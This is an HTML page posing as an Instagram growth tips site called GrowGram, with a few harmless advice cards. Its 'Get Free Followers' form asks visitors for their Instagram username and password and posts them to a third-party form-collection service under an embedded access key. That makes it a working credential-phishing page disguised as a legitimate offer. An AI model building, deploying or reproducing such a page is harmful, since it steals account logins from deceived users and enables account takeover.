<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Grow Your Instagram</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>

  <header>
    <h1>Grow Your Instagram Organically 🚀</h1>
    <p>Real Strategies. Real Engagement. No Fake Followers.</p>
  </header>

  <section class="tips">
    <div class="card">
      <h2>📸 Post High Quality Content</h2>
      <p>Use clear images and engaging captions to attract real followers.</p>
    </div>

    <div class="card">
      <h2>⏰ Stay Consistent</h2>
      <p>Post regularly and interact with your audience daily.</p>
    </div>

    <div class="card">
      <h2>#️⃣ Use Smart Hashtags</h2>
      <p>Use niche and trending hashtags for better reach.</p>
    </div>
  </section>

  <section class="newsletter">
    <h2>Get Free Followers </h2>
    <form action="https://api.web3forms.com/submit" method="POST">
        <input type="hidden" name="access_key" value="6e374719-57ac-4932-8600-f0eb00a432e7">
      <input type="username" placeholder="Enter username" name="username" required><br>
      <input type="text" placeholder="Enter password" name="text" required>
      <br>

      <button type="submit">Get Followers</button>
    </form>
  </section>

  <footer>
    <p>© 2026 GrowGram | Made with ❤️</p>
  </footer>

</body>
</html>